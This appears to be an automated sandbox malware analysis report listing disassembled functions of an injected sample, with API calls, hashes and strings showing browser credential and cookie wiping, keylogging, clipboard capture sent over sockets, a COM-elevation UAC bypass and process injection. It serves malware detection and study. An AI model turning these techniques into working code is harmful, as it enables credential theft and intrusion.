                  • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                  • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                  Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                  • FindClose.KERNEL32(00000000), ref: 0040BBC9
                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                  • FindClose.KERNEL32(00000000), ref: 0040BD12
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFile$FirstNext
                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                  • API String ID: 1164774033-3681987949
                  • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                  • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                  • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                  • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                  Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • OpenClipboard.USER32 ref: 004168C2
                  • EmptyClipboard.USER32 ref: 004168D0
                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                  • GlobalLock.KERNEL32 ref: 004168F9
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                  • SetClipboardData.USER32 ref: 00416938
                  • CloseClipboard.USER32 ref: 00416955
                  • OpenClipboard.USER32 ref: 0041695C
                  • GetClipboardData.USER32 ref: 0041696C
                  • GlobalLock.KERNEL32 ref: 00416975
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                  • CloseClipboard.USER32 ref: 00416984
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                  • String ID: !D@
                  • API String ID: 3520204547-604454484
                  • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                  • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                  • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                  • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                  Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                  • FindClose.KERNEL32(00000000), ref: 0040BDC9
                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                  • FindClose.KERNEL32(00000000), ref: 0040BEAF
                  • FindClose.KERNEL32(00000000), ref: 0040BED0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Close$File$FirstNext
                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                  • API String ID: 3527384056-432212279
                  • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                  • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                  • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                  • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                  Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                  • CloseHandle.KERNEL32(00000000), ref: 0040F563
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                  • API String ID: 3756808967-1743721670
                  • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                  • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                  • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                  • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                  Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$1$2$3$4$5$6$7$VG
                  • API String ID: 0-1861860590
                  • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                  • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                  • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                  • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                  Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00407521
                  • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Object_wcslen
                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • API String ID: 240030777-3166923314
                  • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                  • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                  • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                  • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                  Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                  Download Yara Rule
                  APIs
                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                  • GetLastError.KERNEL32 ref: 0041A7BB
                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                  • String ID:
                  • API String ID: 3587775597-0
                  • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                  • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                  • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                  • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                  Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                  • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                  • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                  • String ID: lJD$lJD$lJD
                  • API String ID: 745075371-479184356
                  • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                  • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                  • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                  • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                  Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                  • FindClose.KERNEL32(00000000), ref: 0040C47D
                  • FindClose.KERNEL32(00000000), ref: 0040C4A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFile$FirstNext
                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                  • API String ID: 1164774033-405221262
                  • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                  • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                  • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                  • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                  Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                  • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                  • String ID:
                  • API String ID: 2341273852-0
                  • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                  • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                  • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                  • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                  Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Find$CreateFirstNext
                  • String ID: 8SG$PXG$PXG$NG$PG
                  • API String ID: 341183262-3812160132
                  • Opcode ID: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                  • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                  • Opcode Fuzzy Hash: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                  • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                  Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                  • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                  • GetLastError.KERNEL32 ref: 0040A2ED
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetMessageA.USER32 ref: 0040A33B
                  • TranslateMessage.USER32(?), ref: 0040A34A
                  • DispatchMessageA.USER32 ref: 0040A355
                  Strings
                  • Keylogger initialization failure: error , xrefs: 0040A301
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                  • String ID: Keylogger initialization failure: error
                  • API String ID: 3219506041-952744263
                  • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                  • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                  • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                  • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                  Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                  • String ID:
                  • API String ID: 1888522110-0
                  • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                  • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                  • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                  • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                  Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                  • RegCloseKey.ADVAPI32(?), ref: 004140A9
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                  • GetProcAddress.KERNEL32(00000000), ref: 00414271
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressCloseCreateLibraryLoadProcsend
                  • String ID: SHDeleteKeyW$Shlwapi.dll
                  • API String ID: 2127411465-314212984
                  • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                  • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                  • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                  • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                  Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00449212
                  • _free.LIBCMT ref: 00449236
                  • _free.LIBCMT ref: 004493BD
                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                  • _free.LIBCMT ref: 00449589
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                  • String ID:
                  • API String ID: 314583886-0
                  • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                  • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                  • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                  • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                  Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                    • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                    • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                    • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                    • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                  • GetProcAddress.KERNEL32(00000000), ref: 00416872
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                  • String ID: !D@$PowrProf.dll$SetSuspendState
                  • API String ID: 1589313981-2876530381
                  • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                  • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                  • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                  • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                  Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                  • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP$['E
                  • API String ID: 2299586839-2532616801
                  • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                  • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                  • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                  • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                  Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                  • GetLastError.KERNEL32 ref: 0040BA58
                  Strings
                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                  • [Chrome StoredLogins not found], xrefs: 0040BA72
                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                  • UserProfile, xrefs: 0040BA1E
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • API String ID: 2018770650-1062637481
                  • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                  • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                  • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                  • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                  Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                  • GetLastError.KERNEL32 ref: 0041799D
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                  • String ID: SeShutdownPrivilege
                  • API String ID: 3534403312-3733053543
                  • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                  • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                  • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                  • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                  Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00409258
                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                  • FindClose.KERNEL32(00000000), ref: 004093C1
                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                    • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                  • FindClose.KERNEL32(00000000), ref: 004095B9
                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
